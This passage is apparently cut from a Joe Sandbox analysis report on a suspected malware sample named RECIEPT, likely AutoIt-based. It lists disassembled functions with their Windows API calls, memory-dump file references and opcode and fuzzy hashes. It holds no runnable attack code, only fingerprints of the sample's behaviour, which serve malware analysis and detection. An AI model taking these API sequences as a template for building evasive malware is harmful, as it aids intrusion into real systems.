                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                        • String ID:
                                        • API String ID: 1597257046-0
                                        • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                        • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                        • __malloc_crt.LIBCMT ref: 0041F5B6
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                        • String ID:
                                        • API String ID: 237123855-0
                                        • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                        • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                        • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                        • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: DeleteDestroyObject$IconWindow
                                        • String ID:
                                        • API String ID: 3349847261-0
                                        • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                        • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                        • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                        • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                        • String ID:
                                        • API String ID: 2223660684-0
                                        • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                        • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                        • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                        • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                        APIs
                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                        • LineTo.GDI32(?,?,?), ref: 00447326
                                        • EndPath.GDI32(?), ref: 00447336
                                        • StrokePath.GDI32(?), ref: 00447344
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                        • String ID:
                                        • API String ID: 2783949968-0
                                        • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                        • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                        • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                        • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                        • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                        • AttachThreadInput.USER32(00000000), ref: 004364AA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                        • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                        • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                        • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                        • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                        • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                          • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                          • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                        • String ID:
                                        • API String ID: 146765662-0
                                        • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                        • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                        • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                        • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00472B63
                                        • GetDC.USER32(00000000), ref: 00472B6C
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                        • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                        • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                        • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                        • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 00472BB2
                                        • GetDC.USER32(00000000), ref: 00472BBB
                                        • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                        • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                        • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                        • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                        • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                        APIs
                                        • __getptd_noexit.LIBCMT ref: 00415150
                                          • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                          • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                          • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                          • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                          • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                        • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                        • __freeptd.LIBCMT ref: 0041516B
                                        • ExitThread.KERNEL32 ref: 00415173
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                        • String ID:
                                        • API String ID: 1454798553-0
                                        • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                        • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                        • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                        • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _strncmp
                                        • String ID: Q\E
                                        • API String ID: 909875538-2189900498
                                        • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                        • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                        • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                        • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                        APIs
                                        • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                          • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                          • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                          • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                        • String ID: AutoIt3GUI$Container
                                        • API String ID: 2652923123-3941886329
                                        • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                        • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                        • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                        • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove_strncmp
                                        • String ID: U$\
                                        • API String ID: 2666721431-100911408
                                        • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                        • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                        • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                        • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                        APIs
                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                        • __wcsnicmp.LIBCMT ref: 00467288
                                        • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                        • String ID: LPT
                                        • API String ID: 3035604524-1350329615
                                        • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                        • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                        • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                        • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: \$h
                                        • API String ID: 4104443479-677774858
                                        • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                        • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                        • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                        • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID: &
                                        • API String ID: 2931989736-1010288
                                        • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                        • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                        • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                        • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
